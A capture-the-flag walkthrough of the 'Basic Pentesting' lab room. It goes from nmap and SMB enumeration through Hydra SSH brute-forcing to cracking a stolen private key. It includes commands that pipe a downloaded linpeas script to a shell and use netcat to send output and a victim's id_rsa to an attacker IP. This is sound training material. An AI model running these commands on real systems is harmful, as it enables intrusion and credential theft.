🐥Basic Pentesting

Reference(s):

Enumeration

Hosts/Ports

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZXasCfWSXQ9lYiKbTNkPs0T+wFym2lZy229LllhY6iDLrjm7LIkhCcrlgnJQtLxl5NPhlHNVmwhlkcPPiAHwluhMVE5xKihQj3i+Ucx2IwiFvfmCz4AKsWlR6N8IZe55Ltw0lcH9ykuKZddg81X85EVsNbMacJNjjyxAtwQmJt1F5kB1B2ixgjLLOyNWafC5g1h6XbEgB2wiSRJ5UA8rOZaF28YcDVo0MQhsKpQG/5oPmQUsIeJTUA/XkoWCjvXZqHwv8XInQLQu3VXKgv735G+CJaKzplh7FZyXju8ViDSAY8gdhqpJommYxzqu9s1M31cmFg2fT5V1z9s4DP/vd
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP0SXJpgwPf/e9AT9ri/dlAnkob4PqzMjl2Q9lZIVIXeEFJ9sfRkC+tgSjk9PwK0DUO3JU27pmtAkDL4Mtv9eZw=
|   256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAzy8ZacWXbPGeqtuiJCnPP0LYZYZlMj5D1ZY9ldg1wU
80/tcp   open  http        syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
139/tcp  open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       syn-ack ttl 61 Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        syn-ack ttl 61 Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7

Uptime guess: 0.007 days (since Fri Feb  3 11:41:53 2023)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BASIC2<00>           Flags: <unique><active>
|   BASIC2<03>           Flags: <unique><active>
|   BASIC2<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 44546/tcp): CLEAN (Couldnt connect)
|   Check 2 (port 27338/tcp): CLEAN (Couldnt connect)
|   Check 3 (port 38329/udp): CLEAN (Failed to receive data)
|   Check 4 (port 12209/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2023-02-03T06:51:12-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-02-03T11:51:12
|_  start_date: N/A

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   263.67 ms 10.2.0.1
2   ... 3
4   391.88 ms basicpentest.thm

Services

22 SSH
80 HTTP
139 SMB
445 SMB

Port 8080 does not return anything when we go to the URL. Port 80 shows a website under maintenance:

There's a directory that's housing some more information. We can use ffuf to enumerate the directories.

$ ffuf -w /usr/share/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://basicpentest.thm:80/FUZZ -r -c -v

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://basicpentest.thm:80/FUZZ
 :: Wordlist         : FUZZ: /usr/share/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 1131, Words: 72, Lines: 18, Duration: 391ms]
| URL | http://basicpentest.thm:80/development
    * FUZZ: development

dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

Weak Credentials are present - we will use this information later.

SMB Enumeration

We can enumerate the SMB using smbclient or CrackMapExec and enum4linux

smbclient -L //basicpentest.thm/

	Sharename       Type      Comment
	---------       ----      -------
	Anonymous       Disk      
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

smbclient //basicpentest.thm/Anonymous
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 19 18:31:20 2018
  ..                                  D        0  Thu Apr 19 18:13:06 2018
  staff.txt                           N      173  Thu Apr 19 18:29:55 2018

		14318640 blocks of size 1024. 11094008 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> 

cat staff.txt 
# Announcement to staff:

# PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
# this is how mistakes happen. (This means you too, Jan!)

-Kay

We have a username:Jan which was found from the text. We can use this to bruteforce the password and get into SSH.

Exploitation

SSH Bruteforcing

Now that we have a username, we can use Hydra or Metasploit to bruteforce the SSH login and get foothold into the system:

hydra basicpentest.thm ssh -l jan -P /usr/share/wordlists/rockyou.txt -I
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-03 13:03:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://basicpentest.thm:22/
[STATUS] 143.00 tries/min, 143 tries in 00:01h, 14344256 to do in 1671:50h, 16 active
[STATUS] 112.33 tries/min, 337 tries in 00:03h, 14344062 to do in 2128:12h, 16 active
[STATUS] 105.29 tries/min, 737 tries in 00:07h, 14343662 to do in 2270:36h, 16 active
[22][ssh] host: basicpentest.thm   login: jan   password: ██████████

jan:██████████

Foothold

$ whoami
jan
jan@basic2:~$ pwd
/home/jan
cd home
jan@basic2:/home$ ls
jan  kay

There's another user called Kay which we also found in the note from the SMB share.

Now that we have access to the machine, we can get our user flag then escalate our privs to root. We can use Linpeas to enumerate for possible vectors:

Download the linpeas.sh from the Repo then host a python web server on your machine:

# Attacker:
python3 -m http.server 8080
nc -lvnp 4444 | tee linpeas.log # Starts a listener then outputs the results to a file

# Victim:
curl $IP:8080/linpeas.sh | sh | nc $IP 4444
# Replace $IP with your IP Address

We can see from the linpeas output that Kay has given us their SSH id_rsa which we can use to SSH into her machine :)

Privilege Escalation

Output the SSH key onto a file then do chmod 400 kay_rsa.

# Attacker:
nc -lvnp 4444 > kay_rsa
## This will output to a file

# Victim:
nc -w 2 $IP 4444 < id_rsa
# -----
chmod 400 kay_rsa 

ssh [email protected] -i kay_rsa 
Enter passphrase for key 'kay_rsa': 
[email protected]'s password:

That didn't work, let's instead try to crack the id_rsa password

$ python3 /opt/john/run/ssh2john.py kay_rsa > hash.txt
$ john
John the Ripper password cracker, version 1.8.0
Copyright (c) 1996-2013 by Solar Designer
Homepage: http://www.openwall.com/john/

Usage: john [OPTIONS] [PASSWORD-FILES]
--single                   "single crack" mode
--wordlist=FILE --stdin    wordlist mode, read words from FILE or stdin
--rules                    enable word mangling rules for wordlist mode
--incremental[=MODE]       "incremental" mode [using section MODE]
--external=MODE            external mode or word filter
--stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]
--restore[=NAME]           restore an interrupted session [called NAME]
--session=NAME             give a new session the NAME
--status[=NAME]            print status of a session [called NAME]
--make-charset=FILE        make a charset, FILE will be overwritten
--show                     show cracked passwords
--test[=TIME]              run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..]  [do not] load this (these) user(s) only
--groups=[-]GID[,..]       load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..]     load users with[out] this (these) shell(s) only
--salts=[-]N               load salts with[out] at least N passwords only
--save-memory=LEVEL        enable memory saving, at LEVEL 1..3
--node=MIN[-MAX]/TOTAL     this nodes number range out of TOTAL count
--fork=N                   fork N processes
--format=NAME              force hash type NAME: descrypt/bsdicrypt/md5crypt/
                           bcrypt/LM/AFS/tripcode/dummy/crypt

$ john id_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
████████

ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ cat pass.bak
████████████████████████████████████████████████

PreviousRooms NextBlog

Last updated 2 years ago

hashtagEnumeration

hashtagExploitation

hashtagPrivilege Escalation

Enumeration

Exploitation

Privilege Escalation